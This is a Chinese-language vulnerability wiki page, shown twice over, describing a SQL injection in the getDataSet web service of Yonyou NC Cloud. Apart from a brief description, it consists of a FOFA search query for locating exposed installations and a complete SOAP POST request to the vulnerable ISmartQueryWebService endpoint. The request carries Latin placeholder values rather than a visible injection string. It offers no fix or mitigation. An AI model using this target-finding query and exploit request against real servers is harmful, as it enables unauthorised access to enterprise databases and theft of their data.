fofamini-wiki

登录白背景

源码

用友-NC-Cloud系统getDataSet存在SQL注入漏洞

一、漏洞简介

NC Cloud是用友推出的大型企业数字化平台。用友-NC-Cloud系统getDataSet存在SQL注入漏洞。

二、影响版本

用友NC Cloud

三、资产测绘

fofaapp="用友-NC-Cloud"
登录页面

四、漏洞复现

POST /uapws/service/nc.itf.smart.ISmartQueryWebService HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=0228E626221732545F3EA3725D9F2EC9.ncMem02; JSESSIONID=66E4C3071500C21893E1DBD832D8B8C3.ncMem02
Upgrade-Insecure-Requests: 1
SOAPAction: urn:getDataSet
Content-Type: text/xml;charset=UTF-8
Host: xx.xx.xx.xx
Content-Length: 706

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ism="http://smart.itf.nc/ISmartQueryWebService">
   <soapenv:Header/>
   <soapenv:Body>
      <ism:getDataSet>
         <!--type: string-->
         <ism:string>gero et</ism:string>
         <!--type: string-->
         <ism:string1>sonoras imperio</ism:string1>
         <ism:map>
            <!--type: string-->
            <ism:key>quae divum incedo</ism:key>
            <!--type: string-->
            <ism:value>verrantque per auras</ism:value>
         </ism:map>
         <!--type: string-->
         <ism:stringarrayItem>per auras</ism:stringarrayItem>
      </ism:getDataSet>
   </soapenv:Body>
</soapenv:Envelope>

原文: https://www.yuque.com/xiaokp7/ocvun2/vtiyd83gp70ear5g

# 用友-NC-Cloud系统getDataSet存在SQL注入漏洞

# 一、漏洞简介
NC Cloud是用友推出的大型企业数字化平台。用友-NC-Cloud系统getDataSet存在SQL注入漏洞。

# 二、影响版本

- 用友NC Cloud

# 三、资产测绘

- fofa`app="用友-NC-Cloud"`
- 登录页面

![image.png](./img/eBFrVffTnfGaqhKa/1693575676700-0c5fed77-e3d1-4473-97a7-bfb8e7ae0bc1-345980.png)

## 四、漏洞复现
```
POST /uapws/service/nc.itf.smart.ISmartQueryWebService HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=0228E626221732545F3EA3725D9F2EC9.ncMem02; JSESSIONID=66E4C3071500C21893E1DBD832D8B8C3.ncMem02
Upgrade-Insecure-Requests: 1
SOAPAction: urn:getDataSet
Content-Type: text/xml;charset=UTF-8
Host: xx.xx.xx.xx
Content-Length: 706

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ism="http://smart.itf.nc/ISmartQueryWebService">
   <soapenv:Header/>
   <soapenv:Body>
      <ism:getDataSet>
         
         <ism:string>gero et</ism:string>
         
         <ism:string1>sonoras imperio</ism:string1>
         <ism:map>
            
            <ism:key>quae divum incedo</ism:key>
            
            <ism:value>verrantque per auras</ism:value>
         </ism:map>
         
         <ism:stringarrayItem>per auras</ism:stringarrayItem>
      </ism:getDataSet>
   </soapenv:Body>
</soapenv:Envelope>
```
![image.png](./img/eBFrVffTnfGaqhKa/1699460341163-03c0e4fb-7c51-4e08-b480-6a64d76f1772-787173.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vtiyd83gp70ear5g>